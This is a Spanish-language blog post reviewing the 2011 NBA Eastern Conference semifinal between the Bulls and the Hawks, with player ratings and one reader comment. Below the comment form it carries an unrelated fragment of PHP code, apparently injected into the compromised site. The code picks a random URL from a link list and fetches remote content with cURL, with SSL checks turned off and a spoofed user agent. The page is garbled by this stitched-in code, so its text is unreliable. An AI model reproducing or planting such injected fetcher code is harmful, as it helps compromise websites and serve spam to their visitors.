Segunda Ronda del Este: Bulls 4 – Hawks 2

14 de May de 2011 por TheDeerHunter

Se cumplieron los pronósticos y los Bulls vuelven a sus primeras finales de conferencia desde 1998, el último año de Michael Jordan, Scottie Pippen y Phil Jackson en Chicago, que terminaría posteriormente con el 6º título de la franquicia. Los Hawks caen una vez más derrotados en 2ª ronda, en una extraña maldición que ya parece aquella de la selección Española de fútbol en cuartos.

El equipo del MVP, del CoY y también del ejecutivo del año ha perdido en estas eliminatorias la chispa y brillantez que le llevaron a ser los mejores de la regular y a acaparar todos esos premios, sin embargo les ha venido muy bien esta serie contra los Hawks, equipo rocoso pero limitado, que llegaban al cruce crecidos por la eliminación de Orlando Magic. La defensa se ha afianzado, el ritmo de playoffs se ha asimilado, Rose parece haberse recuperado de sus problemas físicos y Carlos Boozer vuelve a dar señales de vida.

Los Hawks han peleado la serie, llegaron a robar la ventaja campo en el primer choque y han tenido sus opciones para, al menos, forzar el séptimo partido pero con un promedio anotador de no llega a 86 puntos poco se puede hacer. Descontando las victorias donde anotaron 100 o más puntos en ambas el indicador cae hasta unos inaceptables 78 puntos. Los sistemas defensivos de Thibodeau son buenos, pero no tanto.

Dos factores han resultado demoledores para los intereses de Atlanta: Uno es la lesión de Kirk Hinrich cuando precisamente es la posición peor cubierta de la plantilla y la mejor arma de sus rivales. Jeff Teague a cumplido dignamente, pero es ridículo pensar que puede enfrentarse de tú a tú a Derrick Rose. La construcción ha sido mala y eso en playoffs es pecado mortal. Sin contar del agujero que les ha hecho Rose en la defensa. Por ahí se les ha ido media eliminatoria.
El otro factor, consecuencia indirecta del primero, ha sido el bajo rendimiento de Jamal Crawford, el mejor Hawk durante la serie anterior. De más de 20 puntos por partido contra Orlando ha pasado a firmar poco más de 10. Sin él el delicado ataque de Atlanta pierde enteros y el impacto de la segunda unidad tiende a 0. Su ayuda en la dirección tampoco ha solucionado nada.

Atlanta tan sólo ha podido funcionar a base de arreones de casta de Joe Johnson y Josh Smith. El resto, incluido Horford superado por Boozer han estado bastante perdidos en la mayor parte de la serie. Siendo honestos este es el techo de su actual proyecto y tampoco se les ha visto creer en lo contrario. Bastante han hecho con llegar aquí.

MVP: En los Bulls todo gira en torno a Derrick Rose. Demasiado incluso. Casi 30 puntos por partido y 10 asistencias, con más de 4 rebotes además. Sin embargo está lanzando a canasta de forma irregular y ha tenido 3 pérdidas y media. Necesitará estar más fino contra los Heat.

La sorpresa: Dijimos en la previa que si Boozer no se encontraba a si mismo podía resultar devorado por Al Horford. Aún no hemos visto al mejor Carlos Boozer, pero ha sido suficiente para superar a Al Horford. ¿Le resultará más difícil doblegar a Bosh?

La decepción: Con todo lo bien que estuvo Crawford contra Orlando lo ha tirado por tierra ahora. La irregularidad es su gran problema y en esta serie ha lanzado horriblemente mal a canasta.

El mayor esfuerzo en vano: Sólo partidos sobresalientes de Joe Johnson han producido victorias para su equipo. A ese nivel se entiende un poco mejor el contratazo que le firmaron.

Comenta

Un comentario a esta entrada

  1. German dice:
    #1

    Me ha sorprendido la serie de Taj Gibson, su ultimo cuarto en el quinto partido fue sensacional y me parece un gran jugador de rol.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>